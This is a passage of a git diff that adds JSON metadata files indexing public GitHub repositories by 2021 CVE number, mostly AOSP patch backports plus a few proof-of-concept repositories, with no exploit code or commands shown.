+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0516.json b/2021/CVE-2021-0516.json
new file mode 100644
index 0000000000..3798f87d77
--- /dev/null
+++ b/2021/CVE-2021-0516.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486837214,
+ "name": "external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516",
+ "full_name": "Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T04:30:40Z",
+ "updated_at": "2023-08-29T13:26:17Z",
+ "pushed_at": "2022-04-29T04:39:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0519.json b/2021/CVE-2021-0519.json
new file mode 100644
index 0000000000..3874ee2004
--- /dev/null
+++ b/2021/CVE-2021-0519.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484167887,
+ "name": "external_libavc_AOSP10_r33_CVE-2021-0519",
+ "full_name": "nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0519",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0519",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T18:47:00Z",
+ "updated_at": "2022-04-21T18:54:27Z",
+ "pushed_at": "2022-04-21T18:55:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0520.json b/2021/CVE-2021-0520.json
new file mode 100644
index 0000000000..f48bfb03ad
--- /dev/null
+++ b/2021/CVE-2021-0520.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 478992025,
+ "name": "frameworks_av_AOSP10_r33_CVE-2021-0520",
+ "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0520",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0520",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-07T13:14:03Z",
+ "updated_at": "2022-04-07T13:20:16Z",
+ "pushed_at": "2022-04-07T13:20:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 517644190,
+ "name": "frameworks_av_AOSP10_r33_CVE-2021-0520",
+ "full_name": "ShaikUsaf\/frameworks_av_AOSP10_r33_CVE-2021-0520",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_av_AOSP10_r33_CVE-2021-0520",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-07-25T11:51:11Z",
+ "updated_at": "2022-07-25T11:53:59Z",
+ "pushed_at": "2022-07-25T11:54:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0522.json b/2021/CVE-2021-0522.json
new file mode 100644
index 0000000000..d4a2e7b639
--- /dev/null
+++ b/2021/CVE-2021-0522.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484301078,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0522",
+ "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0522",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0522",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T04:59:56Z",
+ "updated_at": "2022-04-22T05:05:46Z",
+ "pushed_at": "2022-04-22T05:06:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0586.json b/2021/CVE-2021-0586.json
new file mode 100644
index 0000000000..cd4be07298
--- /dev/null
+++ b/2021/CVE-2021-0586.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485275591,
+ "name": "packages_apps_Settings_CVE-2021-0586",
+ "full_name": "nanopathi\/packages_apps_Settings_CVE-2021-0586",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_Settings_CVE-2021-0586",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-25T07:58:29Z",
+ "updated_at": "2022-04-25T08:03:35Z",
+ "pushed_at": "2023-04-17T12:36:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0589.json b/2021/CVE-2021-0589.json
new file mode 100644
index 0000000000..f24452a215
--- /dev/null
+++ b/2021/CVE-2021-0589.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 497858524,
+ "name": "System_bt_AOSP10_r33_CVE-2021-0589",
+ "full_name": "Trinadh465\/System_bt_AOSP10_r33_CVE-2021-0589",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/System_bt_AOSP10_r33_CVE-2021-0589",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-30T08:41:07Z",
+ "updated_at": "2023-08-29T14:00:30Z",
+ "pushed_at": "2022-05-30T08:43:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 500419770,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0589",
+ "full_name": "Satheesh575555\/system_bt_AOSP10_r33_CVE-2021-0589",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP10_r33_CVE-2021-0589",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-06-06T12:13:41Z",
+ "updated_at": "2023-08-29T12:48:33Z",
+ "pushed_at": "2022-06-06T12:15:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0594.json b/2021/CVE-2021-0594.json
new file mode 100644
index 0000000000..5256f2d49d
--- /dev/null
+++ b/2021/CVE-2021-0594.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 482734063,
+ "name": "packages_apps_Nfc_AOSP10_r33_CVE-2021-0594",
+ "full_name": "Satheesh575555\/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-18T06:06:42Z",
+ "updated_at": "2022-04-18T06:08:50Z",
+ "pushed_at": "2022-04-18T06:09:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0595.json b/2021/CVE-2021-0595.json
new file mode 100644
index 0000000000..d690b568a1
--- /dev/null
+++ b/2021/CVE-2021-0595.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 470544287,
+ "name": "Settings-CVE-2021-0595",
+ "full_name": "pazhanivel07\/Settings-CVE-2021-0595",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/Settings-CVE-2021-0595",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-16T10:59:58Z",
+ "updated_at": "2022-03-16T10:59:58Z",
+ "pushed_at": "2022-03-16T10:59:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 484316243,
+ "name": "frameworks_base_Aosp10_r33_CVE-2021-0595",
+ "full_name": "pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0595",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0595",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T06:09:00Z",
+ "updated_at": "2023-03-27T01:19:18Z",
+ "pushed_at": "2022-04-22T07:02:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0600.json b/2021/CVE-2021-0600.json
new file mode 100644
index 0000000000..e399e62a12
--- /dev/null
+++ b/2021/CVE-2021-0600.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480769086,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0600",
+ "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0600",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0600",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-12T10:53:20Z",
+ "updated_at": "2023-03-27T01:48:31Z",
+ "pushed_at": "2022-04-12T10:56:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0640.json b/2021/CVE-2021-0640.json
new file mode 100644
index 0000000000..00473f7eff
--- /dev/null
+++ b/2021/CVE-2021-0640.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483976622,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0640",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0640",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0640",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T08:53:08Z",
+ "updated_at": "2023-03-27T01:46:25Z",
+ "pushed_at": "2022-04-21T09:16:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0652.json b/2021/CVE-2021-0652.json
new file mode 100644
index 0000000000..483bf976d3
--- /dev/null
+++ b/2021/CVE-2021-0652.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476594576,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0652",
+ "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0652",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0652",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-01T06:06:53Z",
+ "updated_at": "2023-03-27T01:21:26Z",
+ "pushed_at": "2022-04-01T06:15:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0683.json b/2021/CVE-2021-0683.json
new file mode 100644
index 0000000000..cceaf29362
--- /dev/null
+++ b/2021/CVE-2021-0683.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484377066,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T09:39:02Z",
+ "updated_at": "2022-04-22T09:52:40Z",
+ "pushed_at": "2022-04-22T09:52:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0688.json b/2021/CVE-2021-0688.json
new file mode 100644
index 0000000000..8be1af8bd2
--- /dev/null
+++ b/2021/CVE-2021-0688.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480784663,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0688",
+ "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0688",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0688",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-12T11:40:23Z",
+ "updated_at": "2023-03-27T01:12:42Z",
+ "pushed_at": "2022-04-12T11:46:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0705.json b/2021/CVE-2021-0705.json
new file mode 100644
index 0000000000..c56097d022
--- /dev/null
+++ b/2021/CVE-2021-0705.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 482745572,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0705",
+ "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0705",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0705",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-18T06:51:16Z",
+ "updated_at": "2022-04-18T07:06:25Z",
+ "pushed_at": "2022-04-18T07:06:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 484649034,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0705",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0705",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0705",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T04:47:32Z",
+ "updated_at": "2023-03-27T01:33:47Z",
+ "pushed_at": "2022-04-23T05:02:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0928.json b/2021/CVE-2021-0928.json
new file mode 100644
index 0000000000..fc28e3119e
--- /dev/null
+++ b/2021/CVE-2021-0928.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 453362563,
+ "name": "ReparcelBug2",
+ "full_name": "michalbednarski\/ReparcelBug2",
+ "owner": {
+ "login": "michalbednarski",
+ "id": 1826899,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4",
+ "html_url": "https:\/\/github.com\/michalbednarski"
+ },
+ "html_url": "https:\/\/github.com\/michalbednarski\/ReparcelBug2",
+ "description": "Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`\/`createFromParcel` serialization mismatch in `OutputConfiguration`",
+ "fork": false,
+ "created_at": "2022-01-29T10:14:32Z",
+ "updated_at": "2024-06-07T11:37:20Z",
+ "pushed_at": "2022-03-03T17:50:03Z",
+ "stargazers_count": 99,
+ "watchers_count": 99,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 99,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0954.json b/2021/CVE-2021-0954.json
new file mode 100644
index 0000000000..aee4ed695f
--- /dev/null
+++ b/2021/CVE-2021-0954.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485231470,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0954",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0954",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0954",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-25T05:13:39Z",
+ "updated_at": "2022-04-25T05:22:56Z",
+ "pushed_at": "2022-04-25T05:33:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0963.json b/2021/CVE-2021-0963.json
new file mode 100644
index 0000000000..8574f46131
--- /dev/null
+++ b/2021/CVE-2021-0963.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486966400,
+ "name": "packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963",
+ "full_name": "Trinadh465\/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T12:36:35Z",
+ "updated_at": "2022-04-29T12:38:34Z",
+ "pushed_at": "2022-04-29T12:39:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-10086.json b/2021/CVE-2021-10086.json
new file mode 100644
index 0000000000..304df2faa9
--- /dev/null
+++ b/2021/CVE-2021-10086.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 432034471,
+ "name": "CVE-2021-10086",
+ "full_name": "AK-blank\/CVE-2021-10086",
+ "owner": {
+ "login": "AK-blank",
+ "id": 56591429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4",
+ "html_url": "https:\/\/github.com\/AK-blank"
+ },
+ "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-10086",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-26T02:43:58Z",
+ "updated_at": "2023-04-28T02:53:28Z",
+ "pushed_at": "2021-08-05T06:47:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1056.json b/2021/CVE-2021-1056.json
new file mode 100644
index 0000000000..27b37b6bd8
--- /dev/null
+++ b/2021/CVE-2021-1056.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 327884232,
+ "name": "CVE-2021-1056",
+ "full_name": "pokerfaceSad\/CVE-2021-1056",
+ "owner": {
+ "login": "pokerfaceSad",
+ "id": 22297037,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22297037?v=4",
+ "html_url": "https:\/\/github.com\/pokerfaceSad"
+ },
+ "html_url": "https:\/\/github.com\/pokerfaceSad\/CVE-2021-1056",
+ "description": "PoC for CVE-2021-1056, related to GPU Container Security",
+ "fork": false,
+ "created_at": "2021-01-08T11:29:48Z",
+ "updated_at": "2023-09-28T11:23:45Z",
+ "pushed_at": "2021-01-12T09:21:02Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-1056",
+ "gpu-container",
+ "kubernetes-clusters"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1366.json b/2021/CVE-2021-1366.json
new file mode 100644
index 0000000000..9520be7430
--- /dev/null
+++ b/2021/CVE-2021-1366.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688868813,
+ "name": "CVE-2021-1366",
+ "full_name": "koztkozt\/CVE-2021-1366",
+ "owner": {
+ "login": "koztkozt",
+ "id": 96878659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96878659?v=4",
+ "html_url": "https:\/\/github.com\/koztkozt"
+ },
+ "html_url": "https:\/\/github.com\/koztkozt\/CVE-2021-1366",
+ "description": "Cisco AnyConnect Posture (HostScan) Local Privilege Escalation: CVE-2021-1366",
+ "fork": false,
+ "created_at": "2023-09-08T09:20:20Z",
+ "updated_at": "2023-09-08T09:45:12Z",
+ "pushed_at": "2023-09-08T09:55:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1480.json b/2021/CVE-2021-1480.json
new file mode 100644
index 0000000000..8a3b16caca
--- /dev/null
+++ b/2021/CVE-2021-1480.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 390713933,
+ "name": "sdwan-cve-2021-1480",
+ "full_name": "xmco\/sdwan-cve-2021-1480",
+ "owner": {
+ "login": "xmco",
+ "id": 20705504,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20705504?v=4",
+ "html_url": "https:\/\/github.com\/xmco"
+ },
+ "html_url": "https:\/\/github.com\/xmco\/sdwan-cve-2021-1480",
+ "description": "PoC materials to exploit the CVE-2021-1480 on Cico SD-WAN.",
+ "fork": false,
+ "created_at": "2021-07-29T12:17:50Z",
+ "updated_at": "2023-09-28T11:29:58Z",
+ "pushed_at": "2021-08-02T16:14:44Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
